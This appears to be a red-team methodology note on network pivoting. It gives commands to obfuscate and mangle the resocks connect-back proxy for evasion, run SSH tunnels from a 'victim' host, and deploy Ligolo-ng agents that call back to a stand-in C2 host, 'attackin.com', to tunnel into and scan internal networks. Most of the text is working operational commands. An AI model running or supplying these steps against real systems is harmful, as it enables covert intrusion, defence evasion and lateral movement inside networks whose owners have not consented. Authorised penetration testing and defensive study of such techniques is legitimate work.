Network

Network Pivoting - Methodology

Overview

Resources: Really good Red Team Pivoting Guide - https://artkond.com/2017/03/23/pivoting-guide/ Another one, a lot of standard windows tools- https://hackmag.com/security/windows-pivoting/ Pivoting Lab and Writeup for Syntax- https://tryhackme.com/room/wreath https://executeatwill.com/2022/04/04/TryHackMe-Wreath-Walkthrough/

Tools: New version of Sharpchisel, latest release updated in a pipeline: https://github.com/latortuga71/SharpChisel-NG

Resocks - Go connect-back SOCKS proxy

https://github.com/RedTeamPentesting/resocks

Obfuscate

https://github.com/EvilBytecode/GoRedOps

Obfuscate strings - Can break it

https://github.com/EvilBytecode/GoRedOps/tree/main/GoObfuscator

cd resocks
go get github.com/sirupsen/logrus
go get golang.org/x/tools/go/ast/astutil
cd ..

go run GoFuscator.go -srcpath .\resocks2 -writechanges -calls -loops -strings -stringsKey "0101010101010101010101010101010101010101010101010101010101010101" -stringNonce "010101010101010101010101" -verbose -deadcode

Build with Built in Key / Address

$key = go run . generate  # generate a connection key
$hostsrv = ""

# go build -ldflags="-X main.defaultConnectionKey=$key"

# go build -ldflags="-X main.defaultConnectBackAddress=$hostsrv"

go build -ldflags="-X main.defaultConnectionKey=$key -X main.defaultConnectBackAddress=$hostsrv"

Mangle

go get github.com/Binject/debug/pe

git clone https://github.com/optiv/Mangle
cd Mangle
go build Mangle.go

.\Mangle.exe -I .\resocks.exe -M -O resocks_mangle.exe -S 75
``

Then, server side run the listener with the new key as env var
```bash
# use the key from above
export RESOCKS_KEY=""
resocks listen

RDP

Create RDP Server on Debian-based machine

sudo apt-get update -y
sudo apt-get install xrdp xfce4 -y
sudo systemctl enable xrdp
sudo systemctl start xrdp
sudo ufw allow from any to any port 3389 proto tcp
echo "startxfce4" > ~/.xsession
sudo systemctl restart xrdp

SSH

sudo adduser sshproxy
sudp nano /etc/passwd # Modify so user has /bin/false for shell
sudo apt install proxychains
sudo nano /etc/proxychains.conf

On Victim

USER=""
HOST="" 
ssh -D 9050 $USER@$HOST

Host

sudo proxychains nmap -sT -Pn 192.168.2.7

reverse

ssh -R 9050:localhost:9050 $USER@$HOST -N

Tools

Ligolo-NG

Repo: https://github.com/nicocha30/ligolo-ng/ Guides: https://youtu.be/DM1B8S80EvQ https://software-sinner.medium.com/how-to-tunnel-and-pivot-networks-using-ligolo-ng-cf828e59e740 Reqs: Build from source Requires Go 1.20

Linux Setup
Set-Up Tun Interface for Proxy

# linux agent
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.4/ligolo-ng_agent_0.4.4_linux_amd64.tar.gz && tar -xzvf ligolo-ng_agent_0.4.4_linux_amd64.tar.gz && rm ligolo-ng_agent_0.4.4_linux_amd64.tar.gz

# windows agent
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.4/ligolo-ng_agent_0.4.4_windows_amd64.zip && unzip ligolo-ng_agent_0.4.4_windows_amd64.zip && rm ligolo-ng_agent_0.4.4_windows_amd64.zip


# proxy
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.4/ligolo-ng_proxy_0.4.4_linux_amd64.tar.gz && tar -xzvf ligolo-ng_proxy_0.4.4_linux_amd64.tar.gz && rm ligolo-ng_proxy_0.4.4_linux_amd64.tar.gz

user=
sudo ip tuntap add user $user mode tun ligolo
sudo ip link set ligolo up
Linux Start Proxy
./proxy -h # Help options
./proxy -autocert # Automatically request LetsEncrypt certificates
TLS - No LetsEncrypt
cert=/home/$user/cert.pem
key=/home/$user/cert.pem

./proxy -certfile $cert -keyfile $key
# ./proxy -selfcert # must use -ignore-cert on the agent side
Windows Setup
Proxy Requires Win-Tun .dll from Wireguard project
Invoke-WebRequest -Uri https://www.wintun.net/builds/wintun-0.14.1.zip -OutFile wintun-0.14.1.zip; Expand-Archive -Path wintun-0.14.1.zip -DestinationPath .\; Remove-Item wintun-0.14.1.zip
Invoke-WebRequest -Uri https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.4/ligolo-ng_proxy_0.4.4_windows_amd64.zip -OutFile ligolo.zip; Expand-Archive -Path ligolo.zip -DestinationPath .\; Remove-Item ligolo.zip
Invoke-WebRequest -Uri https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.4/ligolo-ng_agent_0.4.4_windows_amd64.zip -OutFile agent.zip; Expand-Archive -Path agent.zip -DestinationPath .\; Remove-Item agent.zip
Copy-Item -Path .\wintun\bin\amd64\*.dll -Destination .\ligolo\
Agent Usage
c2=https://attackin.com
./agent -connect $c2:11601
Agent SOCKS5
c2=https://attackin.com
./agent -connect --socks $c2:11601
# --socks-user --socks-pass
Interacting - Linux - Add Route to Ligolo
ligolo-ng >> session
1
ifconfig # Agents IPv4 address/ Subnet shown 192.168.0.30/24
sudo ip route add 192.168.0.0/24 dev ligolo # tun device is ligolo
Interacting - Windows - Add Route to Ligolo
netsh int ipv4 show interfaces
route add 192.168.0.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX]
Access Network

From proxy server

start # starts the tunnel
nmap 192.168.0.0/24 -v -sV -n --unprivileged # or -PE, use the tunnel, reduce false-positives if we're not admin
Add Listener to Agent, redirect all traffic from agent 1234 to C2 server 4321

Start a listener on the agent to redirect to the C2 server

# From Ligolo-ng session
listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp

Start a netcat listener to recieve the traffic

# From Proxy
nc -lvp 4321

OpenVPN / HANS


choco install openvpn

# or

iwr https://swupdate.openvpn.org/community/releases/OpenVPN-2.6.6-I001-amd64.msi -o openvpn.msi

3Proxy